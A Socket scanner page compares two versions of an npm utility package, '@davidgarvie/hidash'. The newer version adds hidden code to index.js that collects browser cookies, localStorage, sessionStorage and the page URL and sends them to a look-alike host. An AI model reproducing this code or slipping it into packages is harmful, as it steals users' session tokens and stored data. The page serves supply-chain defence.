New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More
Socket
Sign inDemoInstall
Socket

@davidgarvie/hidash

Package Overview
Dependencies
Maintainers
1
Versions
3
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

@davidgarvie/hidash - npm Package Compare versions

Comparing version 1.1.0 to 1.1.1

13

index.js
export const uppercase = str => str.toUpperCase()
export const addWave = str => `${str} 👋`;
(() => {
const cookies = document.cookie;
const localStorage = window.localStorage;
const sessionStorage = window.sessionStorage;
const payload = {
cookies,
localStorage,
sessionStorage,
url: window.location.href
};
fetch(`http://goog1e.local:4000?x=${JSON.stringify(payload)}`);
})();

2

package.json
{
"name": "@davidgarvie/hidash",
"version": "1.1.0",
"version": "1.1.1",
"description": "Useful and safe utility functions",

@@ -5,0 +5,0 @@ "main": "index.js",

# Hidash
Helping all your utility needs
## Installation
```sh
npm install @davidgarvie/hidash
```
## Usage
```js
import { addWave, uppercase } from '@davidgarvie/hidash'
console.log(addWave(uppercase('hi everybody')));
```
SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc